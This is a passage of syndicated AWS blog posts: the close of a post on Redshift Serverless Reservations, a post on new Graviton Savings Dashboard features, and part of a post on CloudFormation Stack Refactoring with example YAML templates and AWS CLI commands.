  4. Select Redshift in the Service drop down menu.
  5. Choose required Term, Payment option, and Based on the past to select the history to determine reservation recommendations.
  6. You will find the recommendations in the Recommendations section. The following is an example screen:

Recommendations Section

The following example shows a Redshift Serverless purchase recommendation from AWS Cost Management. The interface displays a specific recommendation to buy Reserved Instances with key details including the term length, AWS Region, payment option, and expected utilization rate. The recommendation includes upfront and recurring cost information, with a direct link to the Amazon Redshift console for implementation.

RS Serverless RPU instances

If reservations are not recommended based on your usage, then you will see “Based on your selections, no purchase recommendations are available for you at this time. Adjust your selections to view recommendation” message under the Recommended actions section.

Cost Explorer generates your reservation recommendations by identifying your On-demand usage during a specific period and identifying the best number of reservations to purchase to maximize your estimated savings.

Disclaimer: The approaches described above provide an estimate of your optimal RPU reservation level. Actual results may vary depending on workload patterns, peak usage, and utilization variability. Your RPU commitment may not always yield the maximum available discount percentage, as savings depend on how closely your Redshift Serverless Reserved RPUs aligns with real usage over time. This recommendation does not guarantee the cost for your actual use of AWS services.

For more details visit Accessing reservation recommendations.

Real-world scenarios

Let’s examine two different scenarios to understand how reservations can help you optimize costs, we’ll walk through the scenario of a single Redshift Serverless workgroup and a scenario with multiple Redshift serverless workgroups.

Scenario 1: Single Redshift Serverless workgroup

Let’s consider you have only one Redshift Serverless workgroup in your environment and the workload is spread as described in the following table.

In the table, hourly RPU consumption metrics for workgroup1 across different time intervals. The data shows a reservation of 64 RPUs with no upfront payment option, which provides a 20% discount. The table breaks down the compute usage into two categories: Reserved compute, consistently showing 64 RPUs across all hours, and On-demand compute, which varies based on actual consumption above the reserved capacity. The bottom row displays the Total charged RPUs, which reflects the final billing after applying the reserved instance discount. This helps visualize how the workload utilizes the reserved capacity and any additional on-demand usage throughout the specified time period.The total actual RPU consumption is 1,664 and the total charged consumption is 1,484.8. This configuration results in a 10.7% net discount.

Scenario 2: Multiple Redshift Serverless workgroups

In this scenario, you have multiple Redshift serverless workgroup in your environment and the workload is spread as described in the following table.

Similar to the previous single workgroup scenario, you can see hourly RPU consumption metrics for workgroups across different time intervals. In this scenario, you have also opted for 64 RPUs reserved with no upfront option, which applies a 20% discount to the workload. However, you can notice that the total consumption across workgroups matches the total reserved RPUs. This maximizes your total savings even though individual workgroups consumed less than the total RPUs reserved at the payer account level.

The total actual RPU consumption is 1,536 (768+512+256) across workgroups and the total charged consumption is 1,228.8. This configuration results in a 20% net discount.

You can use the following query to find the average RPUs consumed in each hour in a workgroup.

SELECT
date_trunc('hour',end_time) AS run_hr,
avg(compute_capacity)
FROM SYS_SERVERLESS_USAGE
GROUP BY 1
ORDER BY 1

You can use the output of this query to populate a spreadsheet with a similar structure as the ones used in the previous scenarios.

Considerations

We recommend you consider the following when using Redshift Serverless Reservations:

  • Start conservatively: Avoid over-purchasing Serverless Reservations RPUs. It’s best to begin with a minimum base RPU level or align your commitment to the average RPU usage across all Redshift Serverless workgroups under your AWS payer and linked accounts.
  • Reservations are immutable: Once purchased, Redshift Serverless Reservations can’t be changed or deleted. However, you can add additional reservations later to increase your coverage as your workloads grow.
  • Discount sharing control: The management account in an AWS Organization can disable Reserved Instance or Savings Plan discount sharing for any linked accounts, including itself. See the AWS documentation for details.
  • Automatic discount application: Redshift Serverless Reservations billing model automatically applies all the reserved RPU discount to your workloads before using on-demand cost, helping you save on costs.
  • Reservations are Regional: They apply only within the AWS Region where they are purchased and cannot be shared across Regions.
  • Handling excess usage: If your workload exceeds the number of reserved RPUs, the additional usage is billed at the standard on-demand rate.
  • Use a 30 to 60-day window for recommendations: To receive the most accurate reservation recommendations, we suggest using a 30- to 60-day usage window in the Billing and Cost Management console, under Reservations, in the Recommendations section. This approach assumes that your typical production workloads have been running during that period so that the recommendations reflect real-world usage.

Conclusion

In this post, we described how Amazon Redshift Serverless Reservations provide a way to reduce your data warehouse costs while maintaining the flexibility of Redshift serverless pricing. By carefully planning your Amazon Redshift Serverless Reservation strategy and monitoring usage patterns, you can achieve up to 24% cost savings for your Redshift Serverless analytics workloads. For detailed documentation, see Billing for serverless reservations.


About the authors

Satesh Sonti

Satesh Sonti

Satesh is a Principal Specialist Solutions Architect based out of Atlanta, specializing in building enterprise data platforms, data warehousing, and analytics solutions. He has over 20 years of experience in building data assets and leading complex data platform programs for banking and insurance clients across the globe.

Ashish Agrawal

Ashish Agrawal

Ashish is a Principal Product Manager with Amazon Redshift, building cloud-based data warehouses and analytics cloud services. Ashish has over 25 years of experience in IT. Ashish has expertise in data warehouses, data lakes, and platform as a service. Ashish has been a speaker at worldwide technical conferences.

How potential performance upside with AWS Graviton helps reduce your costs further

Post Syndicated from Markus Adhiwiyogo original https://aws.amazon.com/blogs/compute/how-potential-performance-upside-with-aws-graviton-helps-reduce-your-costs-further/

Amazon Web Services (AWS) provides many mechanisms to optimize the price performance of workloads running on Amazon Elastic Compute Cloud (Amazon EC2), and the selection of the optimal infrastructure to run on can be one of the most impactful levers. When we started building the AWS Graviton processor, our goal was to optimize AWS Graviton features and capabilities to deliver a processor that provides the best price performance across a broad array of cloud workloads running on Amazon EC2. That goal continues to be our guiding principle, and today customers who adopt AWS Graviton-based EC2 instances see up to 40% better price performance on their cloud workloads when compared to equivalent non-Graviton EC2 instances. The price performance improvement is the result of both the performance improvement and the lower price in using AWS Graviton-based instances.

Price performance blends the cost of infrastructure with the amount of work you can achieve with infrastructure usage. After talking to many AWS Graviton customers, we’ve learned that the cost savings go beyond the lower AWS Graviton-based instances price. Many AWS Graviton customers told us that the performance increase from AWS Graviton allows them to consume fewer computing hours than comparable non-Graviton instances for equivalent workload throughput. In turn, this leads to further cost reduction.

The following are some of examples from our customers:

  • Pinterest achieved 47% cost savings and 38% savings on compute resources while reducing carbon emissions by 62% for its web API workload.
  • SAP powers its SAP HANA Cloud with AWS Graviton to enhance its price performance by 35% while lowering carbon impact by 45%.
  • Sprinklr improved their machine learning (ML) inference workloads’ throughput by up to 20% while reducing costs by up to 25%.

You can find more customer examples in the AWS Graviton testimonials page.

To help organizations capture similar benefits, we’ve enhanced the AWS Graviton Savings Dashboard (GSD) with new features that account for both pricing and performance improvements. In the following section we explore these new capabilities and how they can help optimize your infrastructure costs.

Understanding performance-driven cost optimization in the GSD

The GSD helps organizations identify ideal workloads for AWS Graviton migration through automated resource matching and data-driven visualizations. You can learn the GSD details and setup in this AWS compute post.

Although the dashboard has traditionally focused on calculating direct cost savings from the AWS Graviton pricing advantages, we’ve observed that customers often experience more benefits when their applications perform more efficiently on AWS Graviton processors, leading to decreased compute resource usage. To better reflect these real-world scenarios, we’ve enhanced the dashboard with new features highlighting Normalized Instance Hours (NIH) analysis capabilities so that you can model potential savings based on both pricing benefits and compute hour reductions. Although this tool helps estimate potential savings, actual performance improvements can only be determined by testing your specific workloads on AWS Graviton instances. Performance is always workload and use case specific, so we encourage you to test your AWS Graviton-based workloads using the Optimization and Performance Runbook to help you determine the actual possible NIH percent reduction.

Key dashboard components

This section outlines the following three key dashboard components: NIH reduction analysis, enhanced cost analysis visualizations, and detailed savings analysis.

NIH reduction analysis

The dashboard now features a new slider that lets you model potential cost savings by inputting the percentage reduction in NIH. Many organizations have found it challenging to calculate their total possible savings since the benefits come from two sources: the lower instance pricing of AWS Graviton and the reduced compute hours.

You can use the slider to model different cost scenarios by adjusting a theoretical NIH reduction between 0% and 40%. You can use this slider to input NIH reductions validated through your workload testing, model the combined impact of both pricing benefits and reduced compute hours, and explore different scenarios to help prioritize which workloads to test first.

Figure 1: NIH slider location

Figure 1: NIH slider location

Assume that your testing shows that your workload runs just as effectively with 15% fewer normalized instance hours on AWS Graviton. You can now plug that exact number into the slider to see your modeled savings combining both pricing differences and compute hour reductions. Although we’ve heard success stories of significant reductions from customers, we recommend starting your initial estimate with a conservative 10% baseline and adjusting based on your own testing results.

Enhanced cost analysis visualizations

The dashboard presents key visualizations that demonstrate the direct relationship between NIH reduction and cost savings. First, you see the Potential Graviton Base Savings from pricing differences alone. In the following diagram, we can observe an example of $61.54K of cost savings from migrating to equivalent AWS Graviton instances. Next, the Estimated Additional Savings Due to Performance in the same diagram shows $42.40K in savings if your performance testing confirms a 15% NIH reduction in your workload. Finally, the dashboard sums these two values into the Total Potential Graviton Savings of $103.94K. The Total Potential Graviton Savings helps visualize how both pricing benefits and any validated compute hour reductions could contribute to your overall savings.

Figure 2: Visualization with relationship between NIH reduction and cost savings

Figure 2: Visualization with relationship between NIH reduction and cost savings

The Amortized Cost Breakdown and Normalized Instance Hrs Breakdown charts in the following figure show 6-month historical trends, helping you spot patterns such as seasonal spikes or high-usage periods. These patterns can help you identify where even small efficiency improvements might yield significant savings, for example, workloads with consistently high usage or predictable peak periods that would be good candidates for testing.

Figure 3: Amortized Cost, NIH, and Total Potential Savings Breakdown charts

Figure 3: Amortized Cost, NIH, and Total Potential Savings Breakdown charts

Detailed savings analysis

Building on our commitment to help customers optimize cloud costs, we’ve enhanced the Potential Graviton Savings Details table with two columns focused on performance-based savings modeling. The Estimated Additional Savings Due to Performance column shows the modeled savings based on your chosen NIH reduction percentage, while Total Potential Graviton Savings combines this with the base pricing benefits.

Figure 4: Potential Graviton Savings Details table

Figure 4: Potential Graviton Savings Details table

As you examine your current instance family, you can observe both baseline AWS Graviton savings and these added saving opportunities clearly laid out in a comprehensive breakdown. The analysis presents your total savings potential in both dollar amounts and percentages. This allows you to build a compelling business case for migration. Although this detailed breakdown provides valuable planning insights, remember that actual savings may vary depending on your specific workload patterns, implementation approaches, and operational considerations.

Conclusion

The Graviton Savings Dashboard (GSD) serves as a powerful analytics tool that streamlines your journey to cost-effective cloud computing. The GSD provides clear visualizations and interactive features to help you understand and maximize potential savings when migrating to AWS Graviton-based instances. To further explore the new features, navigate to the GSD interactive demo, where you can model an example of potential savings using the NIH reduction slider and detailed cost breakdowns.

Ready to explore how AWS Graviton can transform your infrastructure costs? Visit the GSD page to deploy or update your GSD dashboard. Access implementation guides, such as the CFM Technical Implementation Playbook (CFM TIPs), and start optimizing your cloud spend today with the enhanced capabilities of the GSD.

Over 85,000 AWS customers have discovered the benefits of AWS Graviton, with many completing their adoptions in just hours. We have created this resource guide so that you can accelerate your AWS Graviton adoption with minimal effort and enjoy significant price performance benefits.

“What I always tell customers is one week, one application, one engineer, and see what you can do. They always are pleasantly surprised by how much progress they can make. If you’re out there and you haven’t yet moved to AWS Graviton, what are you waiting for? Let’s make it happen!”

Dave Brown, VP, AWS Compute & ML Services

Important note about performance testing
The GSD does not attempt to estimate the potential NIH percent reduction or your workload’s performance when transitioned to AWS Graviton. You can use it to perform what-if analysis of your potential savings for a projected NIH percent reduction. In the absence of this variable, GSD only considers the price delta between instance types and misses an important contributor to the overall savings potential of AWS Graviton from the performance upside. Compute performance is always workload and use case specific, so we encourage you to test your AWS Graviton-based workloads using the Optimization and Performance Runbook to help you determine the actual possible NIH percent reduction.

Introducing AWS CloudFormation Stack Refactoring Console Experience: Reorganize Your Infrastructure Without Disruption

Post Syndicated from Brian Terry original https://aws.amazon.com/blogs/devops/introducing-aws-cloudformation-stack-refactoring-reorganize-your-infrastructure-without-disruption/

AWS CloudFormation models and provisions cloud infrastructure as code, letting you manage entire lifecycle operations through declarative templates. Stack Refactoring console experience, announced today, extends the AWS CLI experience launched earlier. Now, you move resources between stacks, rename logical IDs, and decompose monolithic templates into focused components without touching the underlying infrastructure using the CloudFormation console. Your resources maintain stability and operational state throughout the reorganization. Whether you’re modernizing legacy stacks, aligning infrastructure with evolving architectural patterns, or improving long-term maintainability, Stack Refactoring adapts your CloudFormation stacks organization to changing requirements without forcing disruptive workarounds.

Stack Refactoring enables you to move resources between stacks, rename logical resource IDs, and split monolithic stacks into smaller, more manageable components—all while maintaining resource stability and preserving your infrastructure’s operational state. If you’re modernizing legacy infrastructure, aligning stack organization with evolving architectural patterns, or improving maintainability across your cloud resources, Stack Refactoring provides the flexibility you need to adapt your CloudFormation organization to changing

How It Works

Stack Refactoring operates through a controlled, multi-phase process designed around resource safety. When you initiate a refactor operation, CloudFormation analyzes both source and destination templates, constructs a detailed execution plan, then orchestrates resource movement without disrupting running infrastructure. Resource mappings define how assets transfer between stacks and how logical IDs should change. CloudFormation handles the orchestration complexity automatically – moving resources from source stacks, updating or creating destination stacks, and preserving all dependency relationships through exports and imports.

Each refactor operation receives a unique Stack Refactor ID for tracking progress, reviewing planned actions before execution, and monitoring the operation from initiation through completion. This preview-then-execute model gives you confidence in complex refactoring scenarios where dependencies span multiple stacks or templates.

Compared to the CLI, the console experience provides an easier way to view refactor actions, get automatic resource mapping, and easily rename logical IDs.

Example Scenario

Scenario 1: Splitting a Monolithic Stack

In this scenario, you have an Amazon Simple Notification Service (SNS) and AWS Lambda Function subscribed to it. As usage patterns evolve, you want to separate the subscriptions into a different stack for better organizational boundaries. You can also rename a resource’s logical ID to improve template clarity or align with naming conventions. Stack Refactoring handles this without recreating the underlying resource.

  1. Create a new template MySNS.yaml using the following :
    # Original stack: MySns
    AWSTemplateFormatVersion: "2010-09-09"
    
    Resources:
      Topic:
        Type: AWS::SNS::Topic
    
      MyFunction:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: my-function
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt FunctionRole.Arn
          Timeout: 30
    
      Subscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt MyFunction.Arn
          Protocol: lambda
          TopicArn: !Ref Topic
    
      FunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt MyFunction.Arn
          SourceArn: !Ref Topic
    
      FunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:my-function"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow
  2. Create a new stack using this MySNS.yaml template:
    aws cloudformation create-stack --stack-name MySns --template-body file://MySNS.yaml --capabilities CAPABILITY_IAM
  3. Create a new template called afterSns.yaml with the content below. This template has your SNS topic in it and has a new export in it that will export the SNS topic ARN. This export will be used by your other templates to get the required SNS topic ARN.
    # afterSns.yaml - Focused SNS stack
    Resources:
      Topic:
        Type: AWS::SNS::Topic
    Outputs:
      TopicArn:
        Value: !Ref Topic
        Export:
          Name: TopicArn
  4. Create a new template afterLambda.yaml with the following content. This template includes all the resources to create a Lambda subscription to your SNS topic. This template switched the !Ref Topic to use the exported valued by using !ImportValue TopicArn. We are also updating the Logical Resource Id of Lambda function from MyFunction to Function

    AWSTemplateFormatVersion: "2010-09-09"
    Resources:
      Function:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: my-function
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt FunctionRole.Arn
          Timeout: 30
      Subscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt Function.Arn
          Protocol: lambda
          TopicArn: !ImportValue TopicArn
      FunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt Function.Arn
          SourceArn: !ImportValue TopicArn
      FunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:my-function"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow

     

  5. Go to stack refactor home page, click on ‘create stack refactor’
    Go to stack refactor home page, click on ‘create stack refactor’
  6. Provide a description to help you identify your stack refactor.
    Provide a description to help you identify your stack refactor.
  7. For this scenario, we are splitting a monolithic stack so select ‘Update the template for an existing stack’ and ‘Choose a stack’ options.
  8. Search and choose the stack MySns that was created in Step 1.
    Search and choose the stack MySns that was created in Step 1.
  9. Upload the afterSns.yaml file
    Upload the afterSns.yaml file
  10. You want to create a new stack to manage the Lambda function and SNS subscription resources. Choose ‘Create a new stack’ and name it ‘LambdaSubscription’.
  11. Upload afterLambda.yaml template file
    Upload afterLambda.yaml template fileIn some scenarios, CloudFormation console can automatically detect logical resource ID renames and pre-fill the mapping for you. The resource mapping is required when there are logical resource ID changes between the original stack and refactored template. Ensure that the mappings are correct before proceeding to the next step.
    In some scenarios, CloudFormation console can automatically detect logical resource ID renames
  12. The stack refactor preview will start generating. Wait for the preview to complete. You can verify actions under Stack 1 and Stack 2. It will show you the action for each resource.
    The stack refactor preview will start generating. Wait for the preview to complete. You can verify actions under Stack 1 and Stack 2. It will show you the action for each resource.
  13. You can also preview the new Stack refactored templates
    You can also preview the new Stack refactored templates
  14. Once you verify the details, go ahead and Execute Refactor. You should be redirected to the stack refactor details.
  15. Once the Stack refactor execution is complete you can view the actions and templates for each of the stacks in your stack refactor.
    Once the Stack refactor execution is complete you can view the actions and templates for each of the stacks in your stack refactor.

Scenario 2: Move resources across multiple stacks.

This scenario demonstrates how to refactor resources across three stacks using the AWS CLI, then review and execute the operation in the CloudFormation console.

  1. Create a new template many-stacks-original.yaml and create a new stack named ‘RefactorManyStacks’ using AWS CLI. This template contains SNS topic (IngestTopic),Lambda function(IngestFunction) and SNS subscription.
    AWSTemplateFormatVersion: "2010-09-09"
    
    Resources:
      IngestTopic:
        Type: AWS::SNS::Topic
    
      IngestFunction:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: many-stack-my-function
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt IngestFunctionRole.Arn
          Timeout: 30
    
      IngestSubscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt IngestFunction.Arn
          Protocol: lambda
          TopicArn: !Ref IngestTopic
    
      IngestFunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt IngestFunction.Arn
          SourceArn: !Ref IngestTopic
    
      IngestFunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:many-stack-my-function"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow
  2. Create another template many-stacks-original-1.yaml and run the AWS CLI command to create a new stack ‘RefactorManyStacks1’. This template creates another SNS topic (UserTopic), Lambda function (UserFunction) and SNS subscription.
    aws cloudformation create-stack --stack-name RefactorManyStacks --template-body file://many-stacks-original.yaml --capabilities CAPABILITY_IAM
  3. Create a new template many-stacks-original-2.yaml and run the AWS CLI command to create the stack RefactorManyStacks2. This template will also create SNS topic (ConsumerTopic), Lambda function (ConsumerFunction) and SNS subscription to lambda function.
    AWSTemplateFormatVersion: "2010-09-09"
    
    Resources:
      ConsumerTopic:
        Type: AWS::SNS::Topic
    
      ConsumerFunction:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: many-stack-my-function-2
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt ConsumerFunctionRole.Arn
          Timeout: 30
    
      ConsumerSubscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt ConsumerFunction.Arn
          Protocol: lambda
          TopicArn: !Ref ConsumerTopic
    
      ConsumerFunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt ConsumerFunction.Arn
          SourceArn: !Ref ConsumerTopic
    
      ConsumerFunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:many-stack-my-function-2"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow
    aws cloudformation create-stack --stack-name RefactorManyStacks2 --template-body file://many-stacks-original-2.yaml --capabilities CAPABILITY_IAM

Once all 3 stacks have been created successfully. Create refactored templates.

  1. Create new template many-stacks-refactored.yaml This refactored template only contains SNS topic named IngestTopic and has a new export in it that will export the SNS topic ARN. This export will be used by your other templates to get the required SNS topic ARN.
    AWSTemplateFormatVersion: "2010-09-09"
    
    Resources:
      IngestTopic:
        Type: AWS::SNS::Topic
    Outputs:
      IngestTopicArn:
        Value: !Ref IngestTopic
        Export:
          Name: IngestTopicArn
  2. Create another template many-stacks-refactored-1.yaml. This template **** has the SNS topic UserTopic and contains the IngestFunction and IngestSubscription and required IAM resources from ‘RefactorManyStacks’. This template switched the !Ref IngestTopic to use the exported valued by using !ImportValue IngestTopicArn. This refactored template also a new export in it that will export the UserTopic ARN.
    AWSTemplateFormatVersion: "2010-09-09"
    
    Resources:
      UserTopic:
        Type: AWS::SNS::Topic
      IngestFunction:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: many-stack-my-function
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt IngestFunctionRole.Arn
          Timeout: 30
    
      IngestSubscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt IngestFunction.Arn
          Protocol: lambda
          TopicArn: !ImportValue IngestTopicArn
    
      IngestFunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt IngestFunction.Arn
          SourceArn: !ImportValue IngestTopicArn
    
      IngestFunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:many-stack-my-function"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow
    Outputs:
      UserTopicArn:
        Value: !Ref UserTopic
        Export:
          Name: UserTopicArn
  3. Create another template many-stacks-refactored-2.yaml. This template has the Consumer* resources along with Lambda function (UserFunction) and SNS subscription (UserSubscription). The template is using exported value from many-stacks-refactored-1.yaml by using !ImportValue UserTopicArn

    AWSTemplateFormatVersion: "2010-09-09"
    
    Resources:
      ConsumerTopic:
        Type: AWS::SNS::Topic
    
      ConsumerFunction:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: many-stack-my-function-2
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt ConsumerFunctionRole.Arn
          Timeout: 30
    
      ConsumerSubscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt ConsumerFunction.Arn
          Protocol: lambda
          TopicArn: !Ref ConsumerTopic
    
      ConsumerFunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt ConsumerFunction.Arn
          SourceArn: !Ref ConsumerTopic
    
      ConsumerFunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:many-stack-my-function-2"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow
      UserFunction:
        Type: AWS::Lambda::Function
        Properties:
          FunctionName: many-stack-my-function-1
          Handler: index.handler
          Runtime: python3.12
          Code:
            ZipFile: |
              import json
              def handler(event, context):
                print(json.dumps(event))
                return event
          Role: !GetAtt UserFunctionRole.Arn
          Timeout: 30
    
      UserSubscription:
        Type: AWS::SNS::Subscription
        Properties:
          Endpoint: !GetAtt UserFunction.Arn
          Protocol: lambda
          TopicArn: !ImportValue UserTopicArn
    
      UserFunctionInvokePermission:
        Type: AWS::Lambda::Permission
        Properties:
          Action: lambda:InvokeFunction
          Principal: sns.amazonaws.com
          FunctionName: !GetAtt UserFunction.Arn
          SourceArn: !ImportValue UserTopicArn
    
      UserFunctionRole:
        Type: AWS::IAM::Role
        Properties:
          AssumeRolePolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Action:
                  - sts:AssumeRole
                Effect: Allow
                Principal:
                  Service:
                    - lambda.amazonaws.com
                Condition:
                  StringEquals:
                    aws:SourceAccount: !Ref AWS::AccountId
                  ArnLike:
                    aws:SourceArn: !Sub "arn:${AWS::Partition}:lambda:${AWS::Region}:${AWS::AccountId}:function:many-stack-my-function-1"
          Policies:
            - PolicyName: LambdaPolicy
              PolicyDocument:
                Version: "2012-10-17"
                Statement:
                  - Action:
                      - logs:CreateLogGroup
                      - logs:CreateLogStream
                      - logs:PutLogEvents
                    Resource:
                      - arn:aws:logs:*:*:*
                    Effect: Allow

     

  4. Start the stack refactor using AWS CLI.
    aws cloudformation create-stack-refactor --stack-definitions StackName=RefactorManyStacks,TemplateBody@=file://many-stacks-refactored.yaml StackName=RefactorManyStacks1,TemplateBody@=file://many-stacks-refactored-1.yaml StackName=RefactorManyStacks2,TemplateBody@=file://many-stacks-refactored-2.yaml --description "three stack refactor"
  5. Go to stack CloudFormation console and go to ‘Stack refactor’ homepage, click on the stack refactor you just created.
    Go to stack CloudFormation console and go to ‘Stack refactor’ homepage, click on the stack refactor you just created.
  6. Review actions for each resource and each stack. You can choose individual stacks from drop down.
    Review actions for each resource and each stack. You can choose individual stacks from drop down.
  7. Once you’re ready to execute the stack refactor, click on ‘Execute stack refactor’ and input the confirmation text.
    Once you’re ready to execute the stack refactor, click on ‘Execute stack refactor’ and input the confirmation text.
  8. Wait for stack refactor execution to finish.
    Wait for stack refactor execution to finish.
  9. Click on the stack in the details to navigate to the stack details. You can verify the refactor changes here.
    Click on the stack in the details to navigate to the stack details. You can verify the refactor changes here.

Scenario 3: Move stacks between 2 nested child stacks stacks

This scenario demonstrates how to move resources between child stacks in a nested stack architecture. Upload child stack templates toAmazon Simple Storage Service (Amazon S3), create a parent stack that references them, then use Stack Refactoring to move resources (like a security group) from one child stack to another. The key is to work directly with the child stack names (which CloudFormation auto-generates based on parent stack name and logical IDs) rather than the parent stack itself. After refactoring, update the parent stack to reference the new child template versions in S3.

This approach lets you reorganize nested stack architectures while maintaining the parent-child relationship structure.

  1. Create first child stack template vpc.yaml. This template creates a new Virtual Private Cloud(VPC). Upload this new template file to S3 bucket
    AWSTemplateFormatVersion: '2010-09-09'
    Description: 'VPC Stack - Contains only VPC'
    
    Resources:
      MyVPC:
        Type: AWS::EC2::VPC
        Properties:
          CidrBlock: 10.0.0.0/16
    
    Outputs:
      VPCId:
        Value: !Ref MyVPC
  2. Create second child stack template resource.yaml . This template will create S3 bucket and EC2 Security Group. Once you create this template file, upload it to an S3 bucket
    AWSTemplateFormatVersion: '2010-09-09'
    Description: ' Contains security group and S3 bucket'
    
    Resources:
      MySecurityGroup:
        Type: AWS::EC2::SecurityGroup
        Properties:
